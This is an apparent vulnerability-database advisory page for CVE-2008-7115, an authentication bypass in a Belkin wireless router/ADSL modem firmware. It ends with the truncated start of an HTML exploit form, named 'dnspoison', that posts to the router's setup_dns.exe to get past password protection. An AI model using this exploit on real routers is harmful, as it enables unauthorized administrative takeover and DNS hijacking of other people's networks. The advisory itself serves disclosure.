10
CVSSv2

CVE-2008-7115

Published: 28/08/2009 Updated: 29/09/2017
CVSS v2 Base Score: 10 | Impact Score: 10 | Exploitability Score: 10
VMScore: 1000
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

The web interface to the Belkin Wireless G router and ADSL2 modem F5D7632-4V6 with firmware 6.01.08 allows remote malicious users to bypass authentication and gain administrator privileges via a direct request to (1) statusprocess.exe, (2) system_all.exe, or (3) restore.exe in cgi-bin/. NOTE: the setup_dns.exe vector is already covered by CVE-2008-1244.

Vulnerable Product Search on Vulmon Subscribe to Product

belkin wireless g router

belkin f5d7632-4 6.01.08

Exploits

<html> <head> </head> <body> <b>html code to bypass the webinterface password protection of the Belkin wireless G router + adsl2 modem<br> It worked on model F5D7632-4V6 with upgraded firmware 60108</b> <br> <form action="19216821/cgi-bin/setup_dnsexe" name=dnspoison method=post&gt ...